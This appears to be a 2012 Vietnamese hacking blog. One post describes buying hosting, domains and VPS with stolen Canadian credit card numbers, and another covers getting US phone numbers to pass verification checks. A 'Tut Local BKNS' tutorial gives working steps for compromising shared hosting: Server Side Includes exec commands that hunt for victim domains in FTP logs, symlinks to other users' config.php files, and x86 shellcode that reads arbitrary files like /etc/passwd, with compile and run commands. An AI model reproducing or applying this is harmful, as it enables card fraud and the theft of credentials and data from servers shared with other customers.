Saturday, January 28, 2012

Hosting-Domain-Vps

Phần này ẩn 1 posts, bạn đang có 3 posts:
HIde Cho cố gắng nha

Phần này ẩn 2 posts, bạn đang có 3 posts:
https://www.hostingzoom.com/
hosting và domain hosting 1month rẻ lắm domain thì hạn chế 1y ko reg cao đc chụi thôi hết hạn thì renew thôi 
Phần này ẩn 2 posts, bạn đang có 3 posts:
http://www.modvps.com/
vps ở đây reg 1 month test thôi đừng có tham thì thâm 1 month rẻ lắm 
Sock gì cũng dc usa nhanh tí
Nguyên liệu:ccn canada mình dùng master đâm hai lần 2 site qua luôn
Đâm xong 24h mới có info nha hơi lâu anh em chụi tạm 
Hướng dẫn tí đến chỗ nhập cc
thì security code nhập 0000 với amex,master
còn visa thì 000
cái ảnh của vps làm mất rồi 
show tạm cái anh hosting và domain thôi 
thank đi pri cho 

Nên Dùng Hàng của bác duyphuong đâm site của em nha qua luôn !!!!
Mình pri mà ai biêt rồi thì đừng ném gạch còn chưa biết thì mời test site mới 
Chúc mọi người thành công

Nhận tin nhắn với số điện thoại từ US dành cho 1 số web bắt verify phone

Trước hết các bác đăng kí 1 nick tại web này

http://www.pinger.com/textfree/






Sau đó gửi tn vào số này và chiến thôi 

/dịch vụ này còn dùng để gửi tin nhắn miễn phí nữa đấy các bác

Friday, January 20, 2012

Tut Local BKNS

direct symljnk
http://my_shell_on_site.com/r00t/user/public_html/

Shtml Bypass View Symlink - Server Side Includes

I. Server Side Includes
II. Find Victim:
cd /var/log/proftpd
more xferlog.*|grep victim.com
cat xferlog.*|grep victim.com
or go to step IV
<!--#exec cmd="more xferlog.*|grep victim.com" -->

III. Symlink:

ln -s /home/...../public_html/config.php config.txt
or go to step IV
<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->
IV. View - Use Server Side Includes:
Create cmd.shtml with content:
<!--#include virtual="config.txt" -->

V. Note:

.htaccess
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

[New method] Local (it can bypass chmod 400)



Chúng ta dùng shell code


/*
Linux/x86 file reader.

65 bytes + pathname
Author: certaindeath

Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two

one:
pop %ebx

movb $5, %al
xor %ecx, %ecx
int $0x80

mov %eax, %esi
jmp read

exit:
movb $1, %al
xor %ebx, %ebx
int $0x80

read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80

xor %ebx, %ebx
cmp %eax, %ebx
je exit

movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80

add $1, %esp
jmp read

two:
call one
.string "file_name"
*/
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"/etc/passwd"; //Put here the file path, default is /etc/passwd
Shellcode này giúp chúng ta view đc file bất kì khi sử dụng và thay đổi path /etc/passwd thành path cần view thôi.
Cách thực hiện.
Save dưới dạng file exploit.c
Sau đó compile lại bằng lệnh 
gcc -o exploit exploit.c
Trông như get root vậy
Sau đó sẽ xuất hiện file exploit
Nâng file đấy lên thành 777.Dùng lệnh
Chmod +x exploit
Và cuối cùng là 
./exploit
Kết quả là ta đọc đc file /etc/passwd
Rất giống getroot phải ko 
Cách thực hiện rất dễ.
GCC.ZIP

Nhiều server cấm lệnh gcc thì bạn có thể dùng file gcc ở 1 server linux nào đó.Máy ảo chẳng hạn.Up lên rồi chmod 777 rồi ./gcc để thực hiện lệnh....
Ngoài ra các bạn có thể làm tắt server bằng file exploit sau đây.